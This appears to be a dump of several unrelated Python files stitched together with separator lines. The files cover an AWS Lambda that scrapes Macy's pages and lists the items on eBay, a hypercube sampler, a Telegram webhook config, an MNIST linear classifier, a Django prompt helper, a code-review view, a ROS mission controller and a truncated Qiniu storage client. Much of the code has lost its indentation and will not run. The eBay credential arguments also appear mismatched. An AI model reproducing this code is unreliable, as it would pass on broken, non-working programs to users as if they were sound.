from message_wrapper import *
# packages for listing to ebay
from ebaysdk.trading import Connection
# packages for the item info formatter
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
sqs = boto3.resource('sqs')
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
# Setting chrome options for our browser
user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36'
chrome_options = Options()
# chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-gpu")
# chrome_options.add_argument("--no-sandbox") # linux only
chrome_options.add_argument("--headless")
chrome_options.add_argument(f'user-agent={user_agent}')
# chrome_options.add_argument("start-maximized")
# chrome_options.add_argument("disable-infobars")
def strip_text(string, rejoin_str=False):
    """removes all punctuation from the string and returns a list of words
    e.g. the text of <div class="price" data-auto="main-price"> Orig. $190.00 </div>
    -> ['Orig', '190', '00']
    rejoin_str == True -> 'Orig 190 00'
    :param string: string containing alphanumeric characters to be split into words
    :param rejoin_str: if True, rejoin the words into a single space-separated string
    """
split_words = re.findall(r"[\w']+", string)
# if we want to make the string into a sentence again
if rejoin_str:
# join the words together with spaces in each of them
return " ".join(split_words)
# return the original words split into a list
return split_words
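# note: this is applied to an element's .text; passing raw markup would also
# capture tag/attribute words, e.g.
#   re.findall(r"[\w']+", '<div class="price">') -> ['div', 'class', 'price']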
def get_macys_item_info(soup):
"""return the needed json/dictionary of a macys item in order to post it to eBay
:param soup: BeautifulSoup() instance
"""
item_details = {}
# TITLE
# filter title solely for words
item_details["Title"] = strip_text(soup.find("div", attrs={"data-el": "product-title"}).text, rejoin_str=True)
# DESCRIPTION
item_details["Description"] = soup.find(attrs={"data-el": "product-details"}).text
# IMAGES
item_details["PictureDetails"] = []
# for each img item in product detail
for img_element in soup.find("ul", class_="c-reset scroller swiper animated").find_all("img"):
# get elt xml
xml_str = str(img_element)
# get info after src attribute
url = xml_str.split(" src=\"")[1]
# clip info after next quote
url = url[:url.find("\" ")]
# append the image url
item_details["PictureDetails"] += [{"PictureURL": url}]
# PRICE
# get original price html element
price_html_text = soup.find(attrs={"data-auto": "main-price"}).text
without_punctuation = strip_text(price_html_text)
# get price, assuming it is the second element
item_details["StartPrice"] = without_punctuation[1]
################# START ITEM SPECIFICS #################
item_details["ItemSpecifics"] = {"NameValueList": [
{"Name": "SizeType", "Value": "Regular"},
# {"Name": "Inseam", "Value": "33"},
# {"Name": "Sleeve Style", "Value": "Short Sleeve"}
]}
name_value_list = item_details["ItemSpecifics"]["NameValueList"]
# --> Color
name_value_list.append({
"Name": "Color",
"Value": soup.find(attrs={"data-auto": "selected-color"}).text
})
# --> Brand
name_value_list.append({
"Name": "Brand",
"Value": strip_text(soup.find(attrs={"data-auto": "product-brand"}).text, rejoin_str=True)
})
# --> Size
name_value_list.append({
"Name": "Size",
"Value": strip_text(
soup.find("li", class_="swatch-itm static",
attrs={"aria-disabled": "false"}).text
)[0]
})
# breadcrumbs --> ["Macy's", 'Women', 'Coats']
breadcrumbs = strip_text(
soup.find("div", class_="breadcrumbs-container").text)
# --> Department
department = breadcrumbs[1]
name_value_list.append({"Name": "Department", "Value": department})
# --> Style
style = breadcrumbs[-1]
name_value_list.append({"Name": "Style", "Value": style})
# --> Type
item_type = breadcrumbs[-1]
name_value_list.append({"Name": "Type", "Value": item_type})
################# END ITEM SPECIFICS #################
return item_details
def format_item_details(message):
    """Formats webpage data for the product into an ebay-friendly template
    :param message: message object representing a message in the queue
    """
    item_details = None
host_functions = {
"macys": get_macys_item_info
}
driver = webdriver.Chrome("./chromedriver", options=chrome_options)
# Set the window size
driver.set_window_size(1500, 1280)
# get the url from the body of the sqs record
item_url = message.body
# go to said items webpage in selenium
driver.get(item_url)
# wait a specified amount of time for elements to be updated
time.sleep(3)
# pass the output to BS4
soup = BeautifulSoup(driver.page_source, "xml")
# close the window (all tabs)
driver.quit()
# get the specific host
host = item_url.split(".")[1]
# use function based on host
try:
# try to find our host url's function
try:
get_item_info = host_functions[host]
except:
LOGGER.error(f"failed to find get_item_info function for {host}")
traceback.print_exc()
# attempt to fetch the details for this item
item_details = get_item_info(soup)
except:
LOGGER.error(f"failed to finish getting item info from {host}")
traceback.print_exc()
raise ValueError
return item_details
def list_ebay_item(item_details):
LOGGER.info(
f"Hello from the eBay Item Lister Lambda! Now listing item: {item_details['Title']}"
)
if os.environ["ENV"] == "SANDBOX":
domain = "api.sandbox.ebay.com"
elif os.environ["ENV"] == "PRODUCTION":
domain = "api.ebay.com"
else:
raise ValueError(f"Invalid market_environment: {os.environ['ENV']}")
api = Connection(
config_file=os.environ.get('EBAY_YAML'),
domain=domain,
appid=os.environ["CLIENT_ID"],
certid=os.environ["DEV_ID"],
devid=os.environ["CLIENT_SECRET"],
token=os.environ["TOKEN"],
password=os.environ["PASSWORD"],
debug=True
)
# create set of style and dept for addition to category search
title_specifics = set(["Style", "Department"])
item_specifics = item_details["ItemSpecifics"]["NameValueList"]
# get the suggested ebay category
category_response = api.execute(
'GetSuggestedCategories', {
# concatenate the style and department
'Query': " ".join(
[item["Value"] for item in item_specifics if item["Name"] in title_specifics] + [item_details["Title"]]
)
}
)
# unwrap suggested categories
suggested_categories = category_response.dict()['SuggestedCategoryArray']['SuggestedCategory']
# set primary category
primary_category_id = suggested_categories[0]["Category"]["CategoryID"]
request = {
"Item": {
**item_details,
# "Title": title,
"Country": "US",
"Location": "US",
"Site": "US",
"ConditionID": "1000", # new for now
"PaymentMethods": "PayPal", # paypal for now
"PayPalEmailAddress": os.environ["EMAIL"],
# Clothing, Shoes & Accessories
"PrimaryCategory": {"CategoryID": primary_category_id},
# "PrimaryCategory": {"CategoryID": "57989"},
# "Description": description, # description passed in from elsewhere
"Quantity": "1",
"ListingDuration": "GTC", # make a listing only last 14 days
# "StartPrice": price,
"Currency": "USD",
"ListingType": "FixedPriceItem",
# "ItemSpecifics": {
# "NameValueList": [
# {"Name": "Color", "Value": "Black"},
# {"Name": "Brand", "Value": "Alternative"},
# {"Name": "Size", "Value": "M"},
# {"Name": "SizeType", "Value": "Regular"},
# {"Name": "Inseam", "Value": "33"},
# {"Name": "Style", "Value": "Polo Shirt"},
# {"Name": "Sleeve Style", "Value": "Short Sleeve"},
# {"Name": "Type", "Value": "Short Sleeve"},
# {"Name": "Department", "Value": "Men"}
# ]
# },
# "PictureDetails": [
# { "PictureURL": "http://www.itcircleconsult.com/eb2017/4a.png" }
# ],
"ReturnPolicy": {
# to avoid handling two-step returns to two different places, we will
"ReturnsAcceptedOption": "ReturnsNotAccepted",
# TODO: REMOVE THESE COMMENTS upon successful api call
# "RefundOption": "MoneyBack",
# "ReturnsWithinOption": "Days_30",
# "Description": "If you are not satisfied, return the keyboard.",
# "ShippingCostPaidByOption": "Seller"
},
"ShippingDetails": {
"ShippingServiceOptions": {
"FreeShipping": "True",
"ShippingService": "USPSMedia"
}
},
# Shorter dispatch times are always better if you can reliably meet them.
"DispatchTimeMax": "2"
}
}
# trigger request and log the response to cloudwatch
response = api.execute("AddItem", request)
print(response.status)
return response
def lambda_handler(event, context):
"""lambda function to list items to eBay's sandbox or production marketplace"""
# get our sqs queue
sqs_queue = get_queue(os.environ["SQS_QUEUE_NAME"])
# fetch the sqs queue messages in batches
sqs_messages = receive_messages(queue=sqs_queue, max_number=2, wait_time=0)
if len(sqs_messages) == 0:
return { "status": 500, "body": "empty queue"} # The server encountered an unexpected condition which prevented it from fulfilling the request.
# var for number of successful ebay postings
successes = 0
# for each message
for msg in sqs_messages:
try:
# format the item in the message for posting
item_details = format_item_details(msg)
# list the item
resp = list_ebay_item(item_details)
LOGGER.warn(resp.text)
successes += 1
except:
LOGGER.error(f"{msg.body} failed to be posted to ebay")
traceback.print_exc()
    if successes == 2:
        LOGGER.info(f"{sqs_messages} successfully posted to ebay")
        return { "status": 200 }  # full success
    elif successes == 1:
        return { "status": 206 }  # 206 Partial Content: only part of the batch was posted
    else:  # successes == 0
        return { "status": 500 }  # the server encountered an unexpected condition which prevented it from fulfilling the request
# TEST OBJECTS ####################################
event = {
"detail": {
"title": "Alternative Gray Citadel Joggers",
"price": "29.50",
"market_environment": os.environ["ENV"],
"description": "they're pretty good, just a lil worn and the drawstring is frayed",
"quantity": "1"
}
}
event2 = {
"message": [
{
"messageId": "059f36b4-87a3-44ab-83d2-661975830a7d",
"receiptHandle": "AQEBwJnKyrHigUMZj6rYigCgxlaS3SLy0a...",
"body": {
"url": "https://www.macys.com/shop/product/calvin-klein-shine-hooded-packable-down-puffer-coat-created-for-macys?ID=11031427&CategoryID=3536,https://www.macys.com/shop/product/cole-haan-box-quilt-down-puffer-coat?ID=2813247&CategoryID=3536"
},
"attributes": {
"ApproximateReceiveCount": "1",
"SentTimestamp": "1545082649183",
"SenderId": "AIDAIENQZJOLO23YVJ4VO",
"ApproximateFirstReceiveTimestamp": "1545082649185"
},
"messageAttributes": {},
"md5OfBody": "098f6bcd4621d373cade4e832627b4f6",
"eventSource": "aws:sqs",
"eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:my-queue",
"awsRegion": "us-east-2"
}
]
}
if __name__ == "__main__":
# run test code
context = None
# print results
print(lambda_handler(event2, None))
# {
# 'Category':
# {'CategoryID': '2887', 'CategoryName': 'Soccer-International
# Clubs', 'CategoryParentID': ['64482', '24409'], 'CategoryParentName':
# ['Sports Mem, Cards & Fan Shop', 'Fan Apparel & Souvenirs']},
# 'PercentItemFound': '89'}
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 26 15:47:35 2019
@author: Dominic
"""
import numpy as np
def generate_points_on_hypercube(nsamples,origin,poffs,p=None,uvecs=None):
if uvecs is None:
epsilon = []
bounds = []
for i in range(len(origin)):
origin_c = np.copy(origin)
poffs_c = np.copy(poffs)
origin_c[i] = poffs_c[i]
bounds += [origin_c]
print(origin_c,poffs_c)
epsilon += [np.linalg.norm(origin_c-poffs_c)]
epsilon = np.array(epsilon)
if p is None:
p = epsilon/epsilon.sum()
print(p)
points = []
for i in range(nsamples):
face = np.random.choice(len(origin),p=p)
points+=[np.random.uniform(bounds[face],poffs)]
return np.array(points)
def clean_pointset(pointset):
pointset = np.copy(pointset)
for point in pointset:
toremove = np.where(np.all(np.less(pointset,point),axis=1))[0]
pointset = np.delete(pointset,toremove,axis=0)
#for point in pointset:
# print(np.less(pointset,point))
# print(np.where(np.logical_all(pointset<point)))
return pointset
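# quick illustration: clean_pointset(np.array([[1, 1], [2, 2], [0, 3]]))
# drops [1, 1] (strictly dominated by [2, 2] in every coordinate) and
# returns [[2, 2], [0, 3]].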
if __name__ == "__main__":
p = generate_points_on_hypercube(200,[120,40],[-200,-300],None)
print(p)
import matplotlib.pyplot as plt
plt.scatter(*p.T)
plt.show()
|
nilq/baby-python
|
python
|
from bot import merger_bot
WEBHOOK_HOST = merger_bot.webhook_host
WEBHOOK_PORT = merger_bot.webhook_port
WEBHOOK_SSL_CERT = './SSL/webhook_cert.pem'  # path to the certificate
WEBHOOK_SSL_PRIV = './SSL/webhook_pkey.pem'  # path to the private key
WEBHOOK_URL_BASE = "https://%s:%s" % (WEBHOOK_HOST, WEBHOOK_PORT)
WEBHOOK_URL_PATH = "/%s/" % merger_bot.telegram_token
OUR_URL = "put yours here"
|
nilq/baby-python
|
python
|
from mnist import MNIST
import sklearn.metrics as metrics
import numpy as np
NUM_CLASSES = 10
def load_dataset():
mndata = MNIST('./data/')
X_train, labels_train = map(np.array, mndata.load_training())
X_test, labels_test = map(np.array, mndata.load_testing())
X_train = X_train/255.0
X_test = X_test/255.0
X_train = X_train[:,:]
X_test = X_test[:,:]
return (X_train, labels_train), (X_test, labels_test)
def train(X_train, y_train):
''' Build a model from X_train -> y_train '''
dim = X_train.shape[1]
label = y_train.shape[1]
mat1 = np.zeros((dim,dim))
mat2 = np.zeros((dim,label))
n=0
for x_i in X_train:
y_i = y_train[n]
mat1 += np.outer(x_i,x_i)
mat2 += np.outer(x_i,y_i)
n+=1
while np.linalg.matrix_rank(mat1) != dim:
mat1 = mat1 + 0.0003*np.eye(dim)
model = np.dot(np.linalg.inv(mat1),mat2)
return model
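# in effect, train() solves a ridge-regularized least-squares problem:
#   W = (X^T X + 0.0003*k*I)^(-1) X^T Y
# where 0.0003*I is added k times, until X^T X + 0.0003*k*I has full rank.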
def one_hot(labels_train):
'''Convert categorical labels 0,1,2,....9 to standard basis vectors in R^{10} '''
label_int = np.array(labels_train)
label_bool = np.zeros((labels_train.size,10), dtype=int)
label_bool[np.arange(labels_train.size),label_int] = 1
return label_bool
def predict(x,y, model):
''' From model and data points, output prediction vectors '''
m = 0
hits = 0
DataSize = y.shape[0]
for m in range(DataSize):
xx=x[m]
Predict_values = list(np.dot(model.T,xx))
winners = [i for i, xx in enumerate(Predict_values) if xx==max(Predict_values)]
        winner = winners[-1]
z = [0 for xx in Predict_values]
z[winner] =1
prediction = z
actual = list(y[m])
if prediction == actual:
hits += 1
return hits
if __name__ == "__main__":
(X_train, labels_train), (X_test, labels_test) = load_dataset()
y_train = one_hot(labels_train)
y_test = one_hot(labels_test)
model = train(X_train, y_train)
train_hits=predict(X_train,y_train,model)
test_hits=predict(X_test,y_test,model)
Train_accuracy = train_hits/float(y_train.shape[0])*100
Test_accuracy = test_hits/float(y_test.shape[0])*100
print "Training Accuracy = "+str(Train_accuracy)+"%","("+str(train_hits)+"/"+str(y_train.shape[0])+")"
print "Test Accuracy = "+str(Test_accuracy)+"%","("+str(test_hits)+"/"+str(y_test.shape[0])+")"
|
nilq/baby-python
|
python
|
import djclick as click
from core.utils import get_approximate_date
def gather_event_date_from_prompt():
date = None
while date is None:
date_str = click.prompt(
click.style(
"What is the date of the event? (Format: DD/MM/YYYY or MM/YYYY)",
bold=True, fg='yellow'))
date = get_approximate_date(date_str)
if date is None:
click.secho("Wrong format! Try again :)", bold=True, fg='red')
return date
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from quixote.errors import TraversalError
from vilya.views.util import jsonize, http_method
from vilya.models.linecomment import PullLineComment
from vilya.models.project import CodeDoubanProject
from vilya.libs.template import st
_q_exports = []
class CodeReviewUI(object):
_q_exports = ['delete', 'edit']
def __init__(self, proj_name):
self.proj_name = proj_name
self.code_review = None
def _q_lookup(self, request, comment_id):
comment = PullLineComment.get(comment_id)
if not comment:
raise TraversalError(
"Unable to find comment %s" % comment_id)
else:
self.code_review = comment
return self
@jsonize
def delete(self, request):
user = request.user
if self.code_review.author == user.name:
ok = self.code_review.delete()
if ok:
                return {'r': 1}  # FIXME: here r=1 means success, inconsistent with other places
return {'r': 0}
@jsonize
@http_method(methods=['POST'])
def edit(self, request):
user = request.user
project = CodeDoubanProject.get_by_name(self.proj_name)
content = request.get_form_var(
'pull_request_review_comment', '').decode('utf-8')
if self.code_review.author == user.name:
self.code_review.update(content)
linecomment = PullLineComment.get(self.code_review.id)
pullreq = True
return dict(
r=0, html=st('/pull/ticket_linecomment.html', **locals()))
return dict(r=1)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from std_msgs.msg import Float32, UInt8
from sensor_msgs.msg import Image, CompressedImage
import enum
import time
import rospy
from cv_bridge import CvBridge
class ControlNode:
def __init__(self):
self.traffic_mission_start = False
self.parking_mission_start = False
self.crossbar_mission_start = False
self.tunnel_mission_start = False
self.intersection_mission_start = False
self.construction_mission_start = False
self.traffic_mission_success = False
self.parking_mission_success = False
self.crossbar_mission_success = False
self.tunnel_mission_success = False
self.intersection_mission_success = False
self.construction_mission_success = False
self.mode_step = enum.Enum('step_of_mode', 'normal_mode traffic_mode parking_mode crossbar_mode tunnel_mode intersection_mode construction_mode')
#self.mode_num = self.mode_step.normal_mode.value
self.mode_num = self.mode_step.traffic_mode.value
#self.mode_num = self.mode_step.crossbar_mode.value
#self.mode_num = self.mode_step.parking_mode.value
#self.mode_num = self.mode_step.tunnel_mode.value
#self.mode_num = self.mode_step.intersection_mode.value
#self.mode_num = self.mode_step.construction_mode.value
self.sequence_num = 1
self.driving_time_pre = time.time()
self.mission_time_pre = time.time()
self.sign_check_time_pre = time.time()
self.pre_check_time_pre = time.time()
self.mission_timeout_pre = time.time()
self.mission_time_delay = 0.1
self.mission_timeout = 0.0
self.img_status = 'compressed' # give 'raw' or 'compressed'
if self.img_status == 'raw':
self.cv_bridge = CvBridge()
self.sub_img_cam = rospy.Subscriber('/image_raw', Image, self.cb_image_receive, queue_size=1)
elif self.img_status == 'compressed':
self.sub_img_cam = rospy.Subscriber('/image_raw/compressed', CompressedImage, self.cb_image_receive, queue_size=1)
self.sub_seq_change = rospy.Subscriber('/mission/seq/change', UInt8, self.cb_sequence_num, queue_size=1)
self.sub_delay_change = rospy.Subscriber('/mission/time/delay', Float32, self.cb_delay_change, queue_size=1)
self.sub_timeout_change = rospy.Subscriber('/mission/time/timeout', Float32, self.cb_timeout_change, queue_size=1)
self.pub_img_driving = rospy.Publisher('/controller/image/driving', CompressedImage, queue_size=1)
self.pub_img_sign = rospy.Publisher('/controller/image/sign', CompressedImage, queue_size=1)
self.pub_img_mission = rospy.Publisher('/controller/image/mission', CompressedImage, queue_size=1)
self.pub_seq_normal = rospy.Publisher('/controller/seq/normal', UInt8, queue_size=1)
self.pub_seq_traffic = rospy.Publisher('/controller/seq/traffic', UInt8, queue_size=1)
self.pub_seq_parking = rospy.Publisher('/controller/seq/parking', UInt8, queue_size=1)
self.pub_seq_crossbar = rospy.Publisher('/controller/seq/crossbar', UInt8, queue_size=1)
self.pub_seq_tunnel = rospy.Publisher('/controller/seq/tunnel', UInt8, queue_size=1)
self.pub_seq_intersection = rospy.Publisher('/controller/seq/intersection', UInt8, queue_size=1)
self.pub_seq_construction = rospy.Publisher('/controller/seq/construction', UInt8, queue_size=1)
loop_rate = rospy.Rate(100)
while not rospy.is_shutdown():
if self.mode_num == self.mode_step.normal_mode.value:
self.fn_normal_publish()
else:
self.fn_mission_publish()
loop_rate.sleep()
def fn_normal_publish(self):
time_now = time.time()
if self.traffic_mission_start:
rospy.loginfo('mode change : traffic mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.traffic_mode.value
self.sequence_num = 1
elif self.parking_mission_start:
rospy.loginfo('mode change : parking mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.parking_mode.value
self.sequence_num = 1
elif self.crossbar_mission_start:
rospy.loginfo('mode change : crossbar mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.crossbar_mode.value
self.sequence_num = 1
elif self.tunnel_mission_start:
rospy.loginfo('mode change : tunnel mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.tunnel_mode.value
self.sequence_num = 1
elif self.intersection_mission_start:
rospy.loginfo('mode change : intersection mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.intersection_mode.value
self.sequence_num = 1
elif self.construction_mission_start:
rospy.loginfo('mode change : construction mode')
self.mission_timeout_pre = time_now
self.mode_num = self.mode_step.construction_mode.value
self.sequence_num = 1
if (time_now - self.mission_time_pre) >= 0.1:
# rospy.loginfo('[normal] mission sequence publish, time: {0:.4f}'.format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_normal.publish(self.sequence_num)
        # TODO: publish mission start points
if (time_now - self.pre_check_time_pre) >= 0.1:
# rospy.loginfo(' pre check sequence publish, time: {0:.4f}'.format(time_now - self.pre_check_time_pre))
self.pre_check_time_pre = time_now
if not self.traffic_mission_success:
self.pub_seq_traffic.publish(90)
if not self.parking_mission_success and self.construction_mission_success:
self.pub_seq_parking.publish(90)
if not self.crossbar_mission_success and self.parking_mission_success:
self.pub_seq_crossbar.publish(90)
if not self.tunnel_mission_success and self.crossbar_mission_success:
self.pub_seq_tunnel.publish(90)
if not self.intersection_mission_success and self.traffic_mission_success:
self.pub_seq_intersection.publish(90)
if not self.construction_mission_success and self.intersection_mission_success:
self.pub_seq_construction.publish(90)
def fn_mission_publish(self):
time_now = time.time()
if self.mode_num == self.mode_step.traffic_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('traffic mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_traffic.publish(self.sequence_num)
elif self.mode_num == self.mode_step.parking_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('parking mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_parking.publish(self.sequence_num)
elif self.mode_num == self.mode_step.crossbar_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('crossbar mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_crossbar.publish(self.sequence_num)
elif self.mode_num == self.mode_step.tunnel_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('tunnel mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_tunnel.publish(self.sequence_num)
elif self.mode_num == self.mode_step.intersection_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('intersection mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_intersection.publish(self.sequence_num)
elif self.mode_num == self.mode_step.construction_mode.value:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
#rospy.loginfo('construction mission sequence publish, time: ' + "{0:.4f}".format(time_now - self.mission_time_pre))
self.mission_time_pre = time_now
self.pub_seq_construction.publish(self.sequence_num)
else:
if (time_now - self.mission_time_pre) >= self.mission_time_delay:
rospy.logerr('[Error] Wrong Mission Mode')
if self.mission_timeout > 0.1 and (time_now - self.mission_timeout_pre) > self.mission_timeout:
rospy.logwarn('[warning !!] mode change fail !!')
self.traffic_pre_check = False
self.traffic_sign = False
self.pub_seq_traffic.publish(99)
self.pub_seq_parking.publish(99)
self.pub_seq_crossbar.publish(99)
self.pub_seq_tunnel.publish(99)
self.pub_seq_intersection.publish(99)
self.pub_seq_construction.publish(99)
self.mode_num = self.mode_step.normal_mode.value
self.sequence_num = 1
def cb_image_receive(self, msg):
time_now = time.time()
if self.img_status == 'raw':
img = self.cv_bridge.imgmsg_to_cv2(msg, "bgr8")
msg = self.cv_bridge.cv2_to_compressed_imgmsg(img, "jpg")
        # TODO: publish the traffic-sign image
if (time_now - self.sign_check_time_pre) >= 0.01 and self.mode_num == self.mode_step.intersection_mode.value:
#rospy.loginfo(' sign image publish, time: ' + "{0:.4f}".format(time_now - self.sign_check_time_pre))
self.sign_check_time_pre = time_now
self.pub_img_sign.publish(msg)
        # TODO: publish the driving image
if (time_now - self.driving_time_pre) >= 0.1:
#rospy.loginfo(' driving image publish, time: ' + "{0:.4f}".format(time_now - self.driving_time_pre))
self.driving_time_pre = time_now
self.pub_img_driving.publish(msg)
        # TODO: publish the mission image
self.pub_img_mission.publish(msg)
def cb_sequence_num(self, msg):
rospy.loginfo('sequence change : ' + str(msg.data))
        if msg.data == 100:  # sequence end point
self.traffic_mission_start = False
self.parking_mission_start = False
self.crossbar_mission_start = False
self.tunnel_mission_start = False
self.intersection_mission_start = False
self.construction_mission_start = False
if self.mode_num == self.mode_step.traffic_mode.value:
self.traffic_mission_success = True
elif self.mode_num == self.mode_step.parking_mode.value:
self.parking_mission_success = True
elif self.mode_num == self.mode_step.crossbar_mode.value:
self.crossbar_mission_success = True
elif self.mode_num == self.mode_step.tunnel_mode.value:
self.tunnel_mission_success = True
elif self.mode_num == self.mode_step.intersection_mode.value:
self.intersection_mission_success = True
elif self.mode_num == self.mode_step.construction_mode.value:
self.construction_mission_success = True
self.mode_num = self.mode_step.normal_mode.value
self.sequence_num = 1
elif msg.data == 91:
self.traffic_mission_start = True
elif msg.data == 92:
self.parking_mission_start = True
elif msg.data == 93:
self.crossbar_mission_start = True
elif msg.data == 94:
self.tunnel_mission_start = True
elif msg.data == 95:
self.intersection_mission_start = True
elif msg.data == 96:
self.construction_mission_start = True
else:
self.sequence_num = msg.data
if self.mode_num == self.mode_step.traffic_mode.value:
self.pub_seq_traffic.publish(self.sequence_num)
elif self.mode_num == self.mode_step.parking_mode.value:
self.pub_seq_parking.publish(self.sequence_num)
elif self.mode_num == self.mode_step.crossbar_mode.value:
self.pub_seq_crossbar.publish(self.sequence_num)
elif self.mode_num == self.mode_step.tunnel_mode.value:
self.pub_seq_tunnel.publish(self.sequence_num)
elif self.mode_num == self.mode_step.intersection_mode.value:
self.pub_seq_intersection.publish(self.sequence_num)
elif self.mode_num == self.mode_step.construction_mode.value:
self.pub_seq_construction.publish(self.sequence_num)
self.mission_timeout_pre = time.time()
def cb_delay_change(self, msg):
self.mission_time_delay = msg.data
def cb_timeout_change(self, msg):
self.mission_timeout = msg.data
@staticmethod
def main():
rospy.spin()
if __name__ == '__main__':
rospy.init_node('Control_Node')
node = ControlNode()
node.main()
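# Hedged summary of the sequence-number protocol used by this node, inferred
# from the publishes/handlers above (not an official spec):
#   90      pre-check ping, sent once a mission's predecessor has succeeded
#   91..96  mission-start acknowledgements: traffic, parking, crossbar,
#           tunnel, intersection, construction
#   99      abort/reset broadcast after a mode-change timeout
#   100     sequence end: mark the active mission successful, back to normal mode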
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from qiniu import config
from qiniu.utils import urlsafe_base64_encode, entry
from qiniu import http
class BucketManager(object):
"""空间管理类
主要涉及了空间资源管理及批量操作接口的实现,具体的接口规格可以参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/
Attributes:
auth: 账号管理密钥对,Auth对象
"""
def __init__(self, auth):
self.auth = auth
def list(self, bucket, prefix=None, marker=None, limit=None, delimiter=None):
"""前缀查询:
1. 首次请求 marker = None
2. 无论 err 值如何,均应该先看 ret.get('items') 是否有内容
3. 如果后续没有更多数据,err 返回 EOF,marker 返回 None(但不通过该特征来判断是否结束)
具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/list.html
Args:
bucket: 空间名
prefix: 列举前缀
marker: 列举标识符
limit: 单次列举个数限制
delimiter: 指定目录分隔符
Returns:
一个dict变量,类似 {"hash": "<Hash string>", "key": "<Key string>"}
一个ResponseInfo对象
一个EOF信息。
"""
options = {
'bucket': bucket,
}
if marker is not None:
options['marker'] = marker
if limit is not None:
options['limit'] = limit
if prefix is not None:
options['prefix'] = prefix
if delimiter is not None:
options['delimiter'] = delimiter
url = 'http://{0}/list'.format(config.get_default('default_rsf_host'))
ret, info = self.__get(url, options)
eof = False
if ret and not ret.get('marker'):
eof = True
return ret, eof, info
def stat(self, bucket, key):
"""获取文件信息:
获取资源的元信息,但不返回文件内容,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/stat.html
Args:
bucket: 待获取信息资源所在的空间
key: 待获取资源的文件名
Returns:
一个dict变量,类似:
{
"fsize": 5122935,
"hash": "ljfockr0lOil_bZfyaI2ZY78HWoH",
"mimeType": "application/octet-stream",
"putTime": 13603956734587420
}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
return self.__rs_do('stat', resource)
def delete(self, bucket, key):
"""删除文件:
删除指定资源,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/delete.html
Args:
bucket: 待获取信息资源所在的空间
key: 待获取资源的文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
return self.__rs_do('delete', resource)
def rename(self, bucket, key, key_to):
"""重命名文件:
给资源进行重命名,本质为move操作。
Args:
bucket: 待操作资源所在空间
key: 待操作资源文件名
key_to: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
return self.move(bucket, key, bucket, key_to)
def move(self, bucket, key, bucket_to, key_to):
"""移动文件:
将资源从一个空间到另一个空间,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/move.html
Args:
bucket: 待操作资源所在空间
bucket_to: 目标资源空间名
key: 待操作资源文件名
key_to: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
to = entry(bucket_to, key_to)
return self.__rs_do('move', resource, to)
def copy(self, bucket, key, bucket_to, key_to):
"""复制文件:
将指定资源复制为新命名资源,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/copy.html
Args:
bucket: 待操作资源所在空间
bucket_to: 目标资源空间名
key: 待操作资源文件名
key_to: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = entry(bucket, key)
to = entry(bucket_to, key_to)
return self.__rs_do('copy', resource, to)
def fetch(self, url, bucket, key=None):
"""抓取文件:
从指定URL抓取资源,并将该资源存储到指定空间中,具体规格参考:
http://developer.qiniu.com/docs/v6/api/reference/rs/fetch.html
Args:
url: 指定的URL
bucket: 目标资源空间
key: 目标资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
一个ResponseInfo对象
"""
resource = urlsafe_base64_encode(url)
to = entry(bucket, key)
return self.__io_do('fetch', resource, 'to/{0}'.format(to))
def prefetch(self, bucket, key):
"""镜像回源预取文件:
从镜像源站抓取资源到空间中,如果空间中已经存在,则覆盖该资源,具体规格参考
http://developer.qiniu.com/docs/v6/api/reference/rs/prefetch.html
Args:
bucket: 待获取资源所在的空间
key: 代获取资源文件名
Returns:
一个dict变量,成功返回NULL,失败返回{"error": "<errMsg string>"}
